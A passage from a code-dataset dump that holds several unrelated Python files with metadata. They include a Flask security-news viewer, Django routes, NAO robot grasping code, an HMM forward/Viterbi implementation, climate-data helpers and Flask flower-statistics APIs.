{2}\".format(l.href, l.title,\r\n l.content),\r\n \"date\": l.time[:-3]\r\n }\r\n for l in info\r\n ]\r\n data = jsonify(data)\r\n return data\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('base.html')\r\n\r\n@app.route('/data/')\r\ndef data(type):\r\n #message_count = Ipvm.query(SQLAlchemy.func.count(Ipvm.href)).scalar()\r\n if type=='ipvm':\r\n info = Info.query.filter_by(source='ipvm')\r\n elif type=='anquanke':\r\n info=Info.query.filter_by(source='anquanke')\r\n data=data_treat(info)\r\n return data\r\n\r\n@app.route('/ipvmsearch')\r\ndef search():\r\n keyword = request.args.get('keyword')\r\n result = Info.query.filter(or_(Info.title.contains(keyword),Info.content.contains(keyword)),Info.source==\"ipvm\").order_by(Info.time.desc()).all()\r\n if result:\r\n return render_template('ipvmsearch.html', result=result)\r\n else:\r\n return render_template('notfind.html')\r\n\r\n@app.route('/ipvm/')\r\ndef ipvm():\r\n return render_template('ipvm.html')\r\n\r\n@app.route('/anquanke/')\r\ndef anquanke():\r\n return render_template('anquanke.html')\r\n\r\n@app.route('/youshang/')\r\ndef youshang():\r\n hik=Info.query.filter_by(source='hik')\r\n yushi=Info.query.filter_by(source='uniview')\r\n return render_template('youshang.html',hik=hik,yushi=yushi)\r\n\r\n@app.route('/360cert/')\r\ndef cert():\r\n date=Info.query.filter(Info.source==\"360cert\")\r\n return render_template(\"360cert.html\",date=date)\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"securityinfo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113759374","text":"from django.urls import path, include\nfrom .views import *\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('', index, name='index'),\n path('category//', product_in_category, name='product_in_category'),\n path('tag//', product_tagged, name='product_tagged'),\n path('products//', product_detail, name='product_detail'),\n path('products//like',ProductLikeToggle.as_view(), name='product_like-toggle'),\n \n path('comments//',comment_delete, name='comment_delete'),\n path('comments//',comment_update, name='comment_update'),\n \n path('mymap/', mymap, name='mymap'),\n\n path('api/', ApiRoot.as_view(), name=ApiRoot.name),\n path('api/product-categories/', ProductCategoryList.as_view(), name=ProductCategoryList.name),\n path('api/product-categories//', ProductCategoryDetail.as_view(), name=ProductCategoryDetail.name),\n path('api/products/', ProductList.as_view(), name=ProductList.name),\n path('api/products//', ProductDetail.as_view(), name=ProductDetail.name),\n path('api/products//like', ProductLikeAPIToggle.as_view(), name=ProductLikeAPIToggle.name),\n path('api/comments/', CommentList.as_view(),name=CommentList.name),\n path('api/comments//', CommentDetail.as_view(),name=CommentDetail.name),\n path('api/replies/', ReplyList.as_view(), name=ReplyList.name),\n path('api/replies//', ReplyDetail.as_view(), name=ReplyDetail.name),\n \n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\nurlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)\n","sub_path":"myside/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"281815364","text":"import time\nimport math\nfrom naoqi import ALProxy, ALBroker, ALModule\nimport numpy as np\nimport cv2\nimport NaoImageProcessing, LinesAndPlanes\nimport vision_definitions\nimport ConfigParser, argparse\nimport imageProcessing\n\nclass ManipulationClass():\n def __init__(self, motionproxy, Nao_object, grab_number, grabPoint, memory, postureproxy, grab_direction):\n self.motionproxy = motionproxy\n self.grab_number = grab_number\n self.grabPoint = grabPoint\n self.memory = memory\n self.grab_direction = grab_direction\n self.Nao_object = Nao_object\n self.postureproxy = postureproxy\n\n def objectAction(self, action):\n \"\"\"\n Called from object_manipulation function, it runs object grabbing with NAO.\n \"\"\"\n rotControl = True\n if rotControl:\n mask = 15\n else:\n mask = 7\n\n xOffset_app = 0.0\n xOffset_lift = 0.0\n xOffset_grab = 0.0\n sideOffset_app = 0.0\n sideOffset_grab = 0.0\n sideOffset_lift = 0.0\n heightOffset_app = 0.0\n heightOffset_grab = 0.0\n heightOffset_lift = 0.0\n rotation = 1\n\n safeUp = [0.1, self.grab_number * 0.20, 0.41, 0, 0, 0]\n beh_pose = [0.05, self.grab_number * 0.05, 0.41, 0, 0, 0]\n\n hand = str(self.grab_direction) + 'Hand'\n arm = str(self.grab_direction) + 'Arm'\n\n chainName=arm\n handName=hand\n self.motionproxy.setStiffnesses(arm,1.0)\n #motionProxy.setStiffnesses(\"RArm\",0.0)\n #self.motionproxy.setAngles(hand,1.0,0.4)\n\n if self.Nao_object == 'Cup':\n sideOffset_app= self.grab_number * 0.04\n rotation= (-1) * self.grab_number * 1.57\n heightOffset_lift = 0.05\n xOffset_lift =0.0\n xOffset_grab = 0.0\n heightOffset_grab = 0.0\n heightOffset_app = 0.0\n else:\n if self.Nao_object == 'Frog':\n heightOffset_app = 0.12\n heightOffset_lift = 0.12\n heightOffset_grab = 0.0\n rotation = 0.0\n xOffset_grab = 0.0\n else:\n if self.Nao_object == 'Plane':\n heightOffset_app = 0.12\n heightOffset_lift = 0.12\n heightOffset_grab = 0.0\n rotation = 0.0\n xOffset_grab = 0.02\n\n\n approachPoint = [self.grabPoint[0] + xOffset_app, self.grabPoint[1] + sideOffset_app, self.grabPoint[2]+heightOffset_app + 0.02, rotation, 0, 0]\n grabPoint = [self.grabPoint[0] + xOffset_grab, self.grabPoint[1] + sideOffset_grab, self.grabPoint[2] + heightOffset_grab - 0.01, rotation, 0, 0]\n liftPoint = [self.grabPoint[0] + xOffset_lift, self.grabPoint[1] + sideOffset_lift, self.grabPoint[2] + heightOffset_lift, rotation, 0, 0]\n\n if action == \"Grab\":\n self.motionproxy.setAngles(hand,1.0,0.4)\n listOfPointsBeforeGrasp = [safeUp, approachPoint, grabPoint]\n listOfTimesBeforeGrasp = [2, 4, 5]\n\n test = self.memory.getData('ObjectGrabber')\n if test:\n return None\n\n self.motionproxy.wbEnableEffectorControl(chainName, True)\n self.motionproxy.positionInterpolation(chainName, 2, listOfPointsBeforeGrasp,mask,listOfTimesBeforeGrasp,True)\n self.motionproxy.setAngles(handName, 0.0, 0.3)\n time.sleep(1.0)\n test = self.memory.getData('ObjectGrabber')\n if test:\n return None\n self.motionproxy.positionInterpolation(chainName, 2, liftPoint, mask, 1, True)\n time.sleep(0.5)\n\n #self.motionproxy.positionInterpolation(chainName, 2, beh_pose, mask, 2, True)\n self.motionproxy.positionInterpolation(\"Torso\", 2, beh_pose, mask, 1, True)\n return 1\n\n elif action == \"putBack\":\n grabPoint2 = [self.grabPoint[0] + xOffset_grab + 0.1, self.grabPoint[1] + sideOffset_grab, self.grabPoint[2] + heightOffset_grab, rotation, 0, 0]\n grabPoint3 = [self.grabPoint[0] + xOffset_grab + 0.05, self.grabPoint[1] + sideOffset_grab + self.grab_number * 0.15, self.grabPoint[2] + 0.10, rotation, 0, 0]\n self.motionproxy.setAngles(handName, 0.0, 0.3)\n #self.motionproxy.positionInterpolation(chainName, 2, grabPoint, mask, 2, True)\n self.motionproxy.positionInterpolation(chainName, 2, grabPoint2, mask, 2, True)\n time.sleep(0.5)\n self.motionproxy.setAngles(handName, 1.0, 0.5)\n test = self.memory.getData('ObjectGrabber')\n if test:\n return None\n time.sleep(1)\n self.motionproxy.positionInterpolation(chainName, 2, grabPoint3, mask, 2, True)\n #self.motionproxy.positionInterpolation(chainName, 2, approachPoint, mask, 2, True)\n #self.motionproxy.positionInterpolation(chainName, 2, safeUp, mask, 1, True)\n time.sleep(1)\n test = self.memory.getData('ObjectGrabber')\n if test:\n return None\n safeUp2=[0.05, self.grab_number * 0.05, 0.35, 0, 0, 0]\n #self.motionproxy.positionInterpolation(chainName, 2, safeUp2, mask, 2, True)\n self.motionproxy.positionInterpolations([chainName, \"Torso\"],2,[[safeUp2],[[0.05,0,0.32,0,0,0]]],[7, 7],[[2],[2]],True)\n #self.motionproxy.positionInterpolations([chainName, \"Torso\"], 2, [[safeUp], [[0.15, 0, 0.34, 0, 0, 0]]],\n # [15, 15], [[2], [2]], True)\n\n\n #self.motionproxy.positionInterpolation(\"Torso\", 2, beh_pose, mask, 1, True)\n\n #self.postureproxy.goToPosture(\"StandInit\", 0.8)\n self.motionproxy.wbEnableEffectorControl(chainName, False)\n return 1\n else:\n return None","sub_path":"objectManipulation.py","file_name":"objectManipulation.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"515091386","text":"from tqdm import tqdm\nimport numpy as np\n\nclass Trainer(object):\n def __init__(self, model, args, X, L_star = None):\n self.model = model\n self.args = args\n self.L_star = None\n if L_star is not None:\n self.L_star = L_star\n self.error_ls = []\n self.X = X\n if args.model_name == 'subgradient':\n self.train = self.train_subgradient\n if args.model_name == 'A_IRLS_combined':\n self.train = self.train_A_ILRS_combined\n if args.model_name == 'A_IRLS':\n self.train = self.train_A_ILRS\n def train_subgradient(self,args,U,V):\n U0,V0 = U,V\n max_iter = args.max_iter_subG\n lr = args.lr\n for _ in tqdm(range(max_iter)):\n U0 += self.model(U0,V0,self.X, target_grad='u')*lr\n V0 += self.model(U0,V0,self.X, target_grad='v')*lr\n if self.L_star is not None:\n error = np.sum(np.abs(U0@V0.T-self.L_star))\n self.error_ls.append(error)\n return U0,V0\n def train_A_ILRS_combined(self,args,U,V):\n U0,V0 = U,V\n max_iter = args.max_iter_A_ILRS_combined\n for _ in tqdm(range(max_iter)):\n U0 = self.model(U0,V0,self.X, target_grad='u')\n V0 = self.model(U0,V0,self.X, target_grad='v')\n if self.L_star is not None:\n error = np.sum(np.abs(U0@V0.T-self.L_star))\n self.error_ls.append(error)\n return U0,V0\n def train_A_ILRS(self,args,U,V):\n U0,V0 = U,V\n d,n = self.X.shape\n max_iter = args.max_iter_A_ILRS\n for _ in tqdm(range(max_iter)):\n for k in range(n):\n V0[k,:] = self.model(U0,V0,self.X[:,k],target_grad='v')\n for k in range(d):\n U0[k,:] = self.model(U0,V0,self.X[k,:],target_grad='u')\n if self.L_star is not None:\n error = np.sum(np.abs(U0@V0.T-self.L_star))\n self.error_ls.append(error)\n return U0,V0\n\n\n\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"134905789","text":"# General Helper Functions\n\nimport cf_units as unit\nimport cftime\nimport iris\nimport iris.coord_categorisation\nfrom iris.analysis.cartography import unrotate_pole\nfrom iris.coords import AuxCoord\nfrom iris.experimental.equalise_cubes import equalise_attributes\nfrom iris.util import unify_time_units\nimport numpy as np\nfrom numpy import meshgrid\nimport numpy.ma as ma\nfrom scipy.interpolate import griddata\nfrom statsmodels.tsa.seasonal import STL\nimport pandas as pd\nimport dask\nimport dask.array as da\nimport dask.delayed as delayed\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\ndef apply_common_time_coordinates(cube):\n u = unit.Unit('days since 1979-01-01 00:00:00', calendar='gregorian')\n \n if cube.coord('time').units.calendar == '365_day': # This is only needed for RACMO(ERA5)\n \n dates_365 = cube.coord('time').units.num2date(cube.coord('time').points)\n #iris.unit.num2date(time_value, unit, calendar) [For the given units and the given values, convert to datetimes]\n dates_gregorian = []\n\n for date in dates_365:\n year = date.year\n month = date.month\n day = date.day\n hour = date.hour\n dates_gregorian.append(cftime.DatetimeGregorian(year, month, day, hour, 0, 0, 0))\n \n # converts each 365 datetime object to a gregorian datetime object\n \n num_gregorian = unit.date2num(dates_gregorian, 'days since 1979-01-01 00:00:00', calendar='gregorian')\n \n # returns values for each datetime given units of gregorian and days since 1979\n \n cube.coord('time').points = num_gregorian # updates cubes time point values\n cube.coord('time').units = unit.Unit(u,calendar = 'gregorian') # updates cubes time units\n\n converted_points = cube.coord('time').units.convert(cube.coord('time').points,u,unit.FLOAT32)\n cube.coord('time').points = converted_points\n \n cube.coord('time').units = u\n cube.coord('time').var_name = 'time'\n cube.coord('time').long_name = 'time'\n cube.coord('time').standard_name = 'time'\n\n cube.coord('time').bounds = None\n cube.coord('time').guess_bounds()\n converted_bounds = cube.coord('time').units.convert(cube.coord('time').bounds,u,unit.FLOAT32)\n cube.coord('time').bounds = converted_bounds\n \ndef add_doy_month_year(cube):\n iris.coord_categorisation.add_day_of_year(cube, 'time', name='day_of_year') \n iris.coord_categorisation.add_month(cube, 'time', name='month') \n iris.coord_categorisation.add_year(cube, 'time', name='year') \n\ndef add_2d_latlon_aux_coords(cube):\n rotated_grid_latitude = cube.coord('grid_latitude').points\n rotated_grid_longitude = cube.coord('grid_longitude').points\n lons,lats = meshgrid(rotated_grid_longitude, rotated_grid_latitude)\n cs = cube.coord_system()\n lons,lats = unrotate_pole(lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)\n #lons,lats = rotate_pole(lons,lats, cs.grid_north_pole_longitude, cs.grid_north_pole_latitude)\n \n grid_lat_dim = cube.coord_dims('grid_latitude')[0]\n grid_lon_dim = cube.coord_dims('grid_longitude')[0]\n \n cube.add_aux_coord(AuxCoord(points=lats, standard_name='latitude', units='degrees'),(grid_lat_dim,grid_lon_dim))\n cube.add_aux_coord(AuxCoord(points=lons, standard_name='longitude', units='degrees'),(grid_lat_dim,grid_lon_dim))\n\ndef examine_postprocessed_data(filename,path):\n\n cube = iris.load(path+filename)[0]\n time = cube.coord('time')\n \n print(color.BOLD +color.PURPLE + filename + color.END)\n \n print(cube)\n \n print(color.BOLD + 'Data:' + color.END)\n print('Units =',cube.units)\n print('Mean =',cube.data.mean())\n print('Sum =',cube.data.sum())\n \n print(color.BOLD + 'Time:' + color.END)\n print('Start Date =',time.units.num2date(time.points[:1]))\n print('End Date =',time.units.num2date(time.points[-1:]))\n print('Units =',time.units)\n print('Frequency =',time.points[1]-time.points[0])\n \ndef regriding_impact(filename,paths,mask):\n broadcasted_mask = np.broadcast_to(mask[np.newaxis,:,:],[12,392,504])\n \n for path in paths:\n cube = iris.load(path+filename)[0]\n cube.data = cube.data*12250**2/10**12\n cube.data = ma.masked_where(broadcasted_mask==False, cube.data) # masking to land only\n print(color.BOLD +color.PURPLE + path+filename + color.END) \n print('Mean =',cube.data.mean())\n print('Sum =',cube.data.sum())\n\ndef regrid(cube,grid_cube,method):\n \n if isinstance(cube.data, ma.MaskedArray):\n #Replacing masked values with zero value\n cube.data = cube.data.filled(0)\n \n #rotating coordinates to equator so distances are approximately euclidean \n lons,lats = cube.coord('longitude').points,cube.coord('latitude').points\n rot_lons,rot_lats = unrotate_pole(lons,lats, 180, 0) \n \n #sample points:\n points = np.array(list(zip(rot_lats.ravel(),rot_lons.ravel())))\n values = cube.data.ravel()\n \n #new grid points:\n grid_lons, grid_lats = grid_cube.coord('longitude').points,grid_cube.coord('latitude').points\n rot_grid_lons,rot_grid_lats = unrotate_pole(grid_lons,grid_lats, 180, 0) \n \n #interpolating:\n regridded_data = griddata(points, values, (rot_grid_lats, rot_grid_lons), method=method, fill_value = 0)\n \n cube_regridded = iris.cube.Cube(\n regridded_data,\n long_name='cube_regridded',\n aux_coords_and_dims=[(grid_cube.coord('latitude'),grid_cube.coord_dims('latitude')),(grid_cube.coord('longitude'),grid_cube.coord_dims('longitude'))]\n )\n \n return(cube_regridded[:])\n\ndef remove_auxcoords(cube):\n for i in cube.aux_coords:\n cube.remove_coord(i)\n\ndef stl_decomposition(timeseries,start_date,frequency):\n data = timeseries[:]\n ds = pd.Series(data, index=pd.date_range(start_date, periods=len(data), freq=frequency), name = 'Decomposition')\n stl = STL(ds, seasonal=13)\n #stl = STL(ds, seasonal=13,robust=True)\n res = stl.fit()\n \n return ([res.trend,res.seasonal,res.resid]) \n\ndef concatenate_cubes(cubelist):\n equalise_attributes(cubelist)\n unify_time_units(cubelist)\n return cubelist.concatenate_cube()\n\ndef multi_apply_along_axis(func1d, axis, arrs, *args, **kwargs):\n \n #arrs = np.copy(arrs)\n \"\"\"\n Given a function `func1d(A, B, C, ..., *args, **kwargs)` that acts on \n multiple one dimensional arrays, apply that function to the N-dimensional\n arrays listed by `arrs` along axis `axis`\n \n If `arrs` are one dimensional this is equivalent to::\n \n func1d(*arrs, *args, **kwargs)\n \n If there is only one array in `arrs` this is equivalent to::\n \n numpy.apply_along_axis(func1d, axis, arrs[0], *args, **kwargs)\n \n All arrays in `arrs` must have compatible dimensions to be able to run\n `numpy.concatenate(arrs, axis)`\n \n Arguments:\n func1d: Function that operates on `len(arrs)` 1 dimensional arrays,\n with signature `f(*arrs, *args, **kwargs)`\n axis: Axis of all `arrs` to apply the function along\n arrs: Iterable of numpy arrays\n *args: Passed to func1d after array arguments\n **kwargs: Passed to func1d as keyword arguments\n \"\"\"\n # Concatenate the input arrays along the calculation axis to make one big\n # array that can be passed in to `apply_along_axis`\n carrs = np.concatenate(arrs, axis)\n \n # We'll need to split the concatenated arrays up before we apply `func1d`,\n # here's the offsets to split them back into the originals\n offsets=[]\n start=0\n for i in range(len(arrs)-1):\n start += arrs[i].shape[axis]\n offsets.append(start)\n \n # The helper closure splits up the concatenated array back into the components of `arrs`\n # and then runs `func1d` on them\n def helperfunc(a, *args, **kwargs):\n arrs = np.split(a, offsets)\n return func1d(*[*arrs, *args], **kwargs)\n \n # Run `apply_along_axis` along the concatenated array\n return np.apply_along_axis(helperfunc, axis, carrs, *args, **kwargs)\n\ndef RMSE(predictions, targets):\n return np.sqrt(((predictions - targets) ** 2).mean())\n\n","sub_path":"src/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"609448059","text":"# -*- coding: utf-8 -*-\n# -------------------------------------------------------------------------------\n# Name: \tmodel.py\n# Author: \tUtahka.A\n# Created: \tJul 11th, 2015\n# Last Date: \tJul 11th, 2015\n# Note:\n# -------------------------------------------------------------------------------\nimport pot\nclass model:\n \"\"\"\n status_arr =[\n [\\{next: xxx\\}, \\{red: xxx, blue: xxx\\}],\n [\\{next: xxx\\}, \\{red: xxx, blue: xxx\\}],\n ...,\n [\\{next: xxx\\}, \\{red: xxx, blue: xxx\\}]\n ]\n \"\"\"\n def __init__(self, status_arr, obs_series=[]):\n self.pot_arr = [] # つぼを格納するリスト\n\n # つぼオブジェクトを作成しながらリストに格納\n for status in status_arr:\n self.pot_arr.append(self.__make_pot(status))\n\n self.pot_num = len(self.pot_arr) # つぼの数\n\n # 各つぼオブジェクトを一方向に連鎖\n for i in range(self.pot_num - 1):\n current_pot = self.pot_arr[i]\n next_pot = self.pot_arr[i+1]\n current_pot.link_pot(next_pot)\n\n if len(obs_series) == 0:\n self.__mk_obs_series()\n else:\n self.__obs_series = obs_series\n self.init_trellis()\n\n # (private) つぼオブジェクト作成メソッド\n def __make_pot(self, status):\n return pot.pot(trans_prob=status[0], emiss_prob=status[1])\n\n # 指定した番号のつぼを返す\n def get_pot(self, pot_num):\n return self.__pot_arr[pot_num-1]\n\n # 観測系列を作成\n def __mk_obs_series(self):\n pot = self.pot_arr[0]\n self.__obs_series = []\n while not pot == None:\n x = pot.draw()\n if x == \"next\":\n pot = pot.next_pot\n else:\n self.__obs_series.append(x)\n\n # 観測系列を返す\n def get_obs_series(self):\n return self.__obs_series\n\n # トレリスの作成メソッド\n def init_trellis(self):\n row_num = self.pot_num\n col_num = len(self.__obs_series)\n self.trellis = [[0.0 for i in range(col_num+1)] for i in range(row_num+1)]\n\n \"\"\"\n calc probabillity method for forward algorithm and viterbi algorithm\n row: 考えているノードの状態番号\n col: 考えているノードの観測番号\n \"\"\"\n def __next_prob(self, row, col):\n trellis = self.trellis\n pot_arr = self.pot_arr\n obs_series = self.get_obs_series()\n hori = 0\n diag = 0\n\n \"\"\"\n hori: トレリス上で横に遷移した場合の確率\n diag: トレリス上で斜めに遷移した場合の確率\n \"\"\"\n if col < len(obs_series)-1:\n # 状態が遷移せずに出力する\n hori = pot_arr[row].trans_prob[\"self\"] * pot_arr[row].emiss_prob[obs_series[col+1]]\n if row < len(pot_arr)-1 and col < len(obs_series)-1:\n # 状態が遷移して出力\n diag = pot_arr[row].trans_prob[\"next\"] * pot_arr[row+1].emiss_prob[obs_series[col+1]]\n return hori, diag\n\n def forward(self):\n self.init_trellis()\n\n obs_series = self.get_obs_series()\n trellis = self.trellis\n pot_arr = self.pot_arr\n obs_series = self.get_obs_series()\n trellis = self.trellis\n\n # トレリスの計算\n trellis[0][0] = pot_arr[0].emiss_prob[obs_series[0]] #左上のノード\n for row in range(len(pot_arr)):\n for col in range(len(obs_series)):\n hori, diag = self.__next_prob(row, col)\n trellis[row][col+1] += trellis[row][col] * hori\n trellis[row+1][col+1] += trellis[row][col] * diag\n trellis[len(pot_arr)][len(obs_series)] = trellis[len(pot_arr)-1][len(obs_series)-1] * pot_arr[len(pot_arr)-1].trans_prob[\"next\"]\n\n # forward アルゴリズムの結果を返す\n return round(trellis[len(pot_arr)][len(obs_series)], 5)\n\n def viterbi(self):\n self.init_trellis()\n\n obs_series = self.get_obs_series()\n trellis = self.trellis\n pot_arr = self.pot_arr\n obs_series = self.get_obs_series()\n trellis = self.trellis\n\n # トレリスの計算\n trellis[0][0] = pot_arr[0].emiss_prob[obs_series[0]] #左上のノード\n for row in range(len(pot_arr)):\n for col in range(len(obs_series)):\n hori, diag = self.__next_prob(row, col)\n if trellis[row][col+1] < trellis[row][col] * hori:\n trellis[row][col+1] = trellis[row][col] * hori\n if trellis[row+1][col+1] < trellis[row][col] * diag:\n trellis[row+1][col+1] = trellis[row][col] * diag\n trellis[len(pot_arr)][len(obs_series)] = trellis[len(pot_arr)-1][len(obs_series)-1] * pot_arr[len(pot_arr)-1].trans_prob[\"next\"]\n\n # forward アルゴリズムの結果を返す\n return round(trellis[len(pot_arr)][len(obs_series)], 5)\n\n\nif __name__ == \"__main__\":\n status_arr = [\n [{\"next\": 0.4}, {\"red\": 0.2, \"blue\": 0.8}],\n [{\"next\": 0.3}, {\"red\": 0.5, \"blue\": 0.5}]\n ]\n\n mod = model(status_arr)\n print(mod.pot_arr[0].get_emiss_prob())\n print(mod.pot_arr[1].get_emiss_prob())\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129738630","text":"# -*- coding: utf-8 -*-\nimport unittest\n\n\ndef suma(num1, num2):\n return num1 + num2\n\n\nclass TestsSuma(unittest.TestCase):\n def test_upper(self):\n num1 = 5\n num2 = 3\n actual = suma(num1, num2)\n esperado = 8\n self.assertEqual(actual, esperado)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"PythonUnitTests/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"287054401","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# 茅岗新村 志明 2019-01-28 7:27\n# 当前计算机登录名称 :志明\n# 项目名称 :\n# 编译器 :PyCharm\n__author____ = '志明'\n__time__ = '2019-01-28 '\n\nimport tensorflow as tf\n\nsess = tf.Session()\nsaver = tf.train.import_meta_graph('log/test-29.meta')\nsaver.restore(sess, tf.train.latest_checkpoint('log/'))\n\ngraph = tf.get_default_graph()\nw1 = graph.get_tensor_by_name(\"w:0\")\nw2 = graph.get_tensor_by_name(\"b:0\")\nprint('还原图', w1, w2)\nprint(sess.run(wb, feed_dict={x: 3}))\n# feed_dict ={w1:13.0,w2:17.0}\n","sub_path":"TensorflowTest/还原图.py","file_name":"还原图.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"260258579","text":"import Authentication\nimport requests\nimport SourceHandler\nimport SettingsHandler\n\nWSJ_URL = \"https://newsapi.org/v2/everything\"\nWATSON_URL = \"https://gateway.watsonplatform.net/natural-language-understanding/api/v1/analyze\"\n\nWSJ_PARAMETERS = {\n \"ApiKey\":Authentication.NewsOrgAPIKey,\n \"language\": \"en\",\n \"q\": \"politics\",\n \"pageSize\":SettingsHandler.MAX_API_RESULTS,\n \"sources\": ','.join(str(s) for s in SourceHandler.GetSources()),\n \"sortBy\":\"publishedAt\"\n}\n\ndef ParseCode(code):\n switcher = {\n 200: \"Everything is OK\",\n 301: \"Server is redirecting to a different endpoint\",\n 401: \"Server Does not think you are authenticated\",\n 400: \"Bad Request\",\n 403: \"Access to resource is forbidden\",\n 404: \"Resource Not Found\"\n }\n return switcher.get(code, 'Unhandled Exception')\n\ndef GetWatsonResponse(parameters):\n return requests.get(WATSON_URL,params=parameters, auth=Authentication.WATSON_AUTH)\n\ndef GetWSJResponse():\n return requests.get(WSJ_URL, params=WSJ_PARAMETERS)\n","sub_path":"APIHandler.py","file_name":"APIHandler.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"508491944","text":"# -*- coding: utf-8 -*-\n\nfrom bson import json_util\nfrom flask import json\nfrom flask import request\n# api 模块添加\nfrom . import api\n\n# Python get Flower Model\nfrom app.api_1_0.api_functions.flowerPackage.get_vsim_hour_day_flower import getFlowers\n# sim_package_flower get Model\nfrom api_functions.flowerPackage.get_sim_package_flower import getSimPackageFlowerNextAPI\nfrom api_functions.flowerPackage.get_sim_package_flower import getSimPackageFlowerAPI\n\n\n@api.route('/get_FlowerQuery/', methods=['POST', 'GET'])\ndef get_FlowerQuery():\n \"\"\"\n :return:\n \"\"\"\n # paramKeyFromRequest = ['querySort','begintime','endtime','mcc','plmn','imsi','agg_group_key','TimezoneOffset']\n Dic_data = request.get_json()\n try:\n querySort = str(Dic_data['querySort'])\n timeList = Dic_data['timeList']\n queryMcc = str(Dic_data['mcc'])\n queryPlmn = str(Dic_data['plmn'])\n queryImsi = str(Dic_data['imsi'])\n aggGroupKey = Dic_data['agg_group_key']\n TimezoneOffset = int(Dic_data['TimezoneOffset'])\n except KeyError as keyerr:\n errInfo = (\"前端POST数据异常,KeyError:{}\".format(keyerr))\n DicData = []\n DicResults = {'info': {'err': True, 'errinfo': errInfo}, 'data': DicData}\n return json.dumps(DicResults, sort_keys=True, indent=4, default=json_util.default)\n\n return getFlowers(querySort=querySort,\n time_list=timeList,\n mcc=queryMcc,\n plmn=queryPlmn,\n imsi=queryImsi,\n flower_query_key=aggGroupKey,\n TimezoneOffset=TimezoneOffset)\n\n\n@api.route('/get_package_flower/', methods=['GET'])\ndef get_package_flower():\n \"\"\"\n :return:\n \"\"\"\n if request.method == 'GET':\n simPackageParam = {\n 'country': request.args.get('Country', 'ae', type=str),\n 'orgName': request.args.get('Org', 'gtbu', type=str),\n 'simType': request.args.get('SimType', '0', type=str),\n 'packageTypeName': request.args.get('PackageTypeName', '', type=str),\n 'avaStatus': request.args.get('AvaStatus', '', type=str),\n 'businessStatus': request.args.get('BusinessStatus', '', type=str),\n 'packageStatus': request.args.get('PackageStatus', '', type=str),\n 'slotStatus': request.args.get('SlotStatus', '', type=str),\n 'bamStatus': request.args.get('BamStatus', '', type=str)\n }\n\n return getSimPackageFlowerAPI(sim_package_param=simPackageParam)\n\n return False\n\n\n@api.route('/get_package_flower_next/', methods=['GET', 'POST'])\ndef get_package_flower_next():\n \"\"\"\n :return:\n \"\"\"\n if request.method == 'POST':\n Dic_data = request.get_json()\n try:\n package_date ={\n 'country': str(Dic_data['Country']),\n 'org': str(Dic_data['Org']),\n 'sim_type': str(Dic_data['SimType']),\n 'package_type_name': str(Dic_data['PackageTypeName']),\n 'next_update_time': str(Dic_data['NextUpdateTime']),\n 'ava_status': str(Dic_data['AvaStatus']),\n 'business_status': str(Dic_data['BusinessStatus']),\n 'package_status': str(Dic_data['PackageStatus']),\n 'slot_status': str(Dic_data['SlotStatus']),\n 'bam_status': str(Dic_data['BamStatus']),\n 'add_group_key': Dic_data['addGroupKey']\n }\n flower_date = {\n 'query_type': Dic_data['queryType'],\n 'list_time': Dic_data['ListTime'],\n 'add_group_key': Dic_data['addGroupKey']\n }\n\n except KeyError as keyerr:\n errInfo = (\"前端POST数据异常,KeyError:{}\".format(keyerr))\n DicData = []\n DicResults = {'info': {'err': True, 'errinfo': errInfo}, 'data': DicData}\n\n return json.dumps(DicResults, sort_keys=True, indent=4, default=json_util.default)\n\n # errInfo = country+org+sim_type+package_type_name+next_update_time+'status'+ava_status+business_status+\\\n # package_status+slot_status+bam_status\n return getSimPackageFlowerNextAPI(package_data=package_date, flower_data=flower_date)\n\n return False\n","sub_path":"app/api_1_0/flower_statics.py","file_name":"flower_statics.py","file_ext":"py","file_size_in_byte":4289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"186903058","text":"import base64\nimport time\nimport hashlib\nimport json\nfrom tqdm import tqdm\n\nfrom DB import DB\n\nimport sys\nsys.path.append('../../caller/')\nfrom utils import get_transaction_info\nfrom ST import ServiceToken\nfrom NFT import NFT\n\n\nFAKE_HASH = 'DCD0B2D32E9329D77AA642A55DC10469A876767493D2F60254A70E4DCD099202'\nFAKE_SERIAL_NUM = '10000001000000c3'\n\n\nclass Fantopia:\n def __init__(\n self,\n owner: dict,\n config: dict,\n sampleLoad: int = 20\n 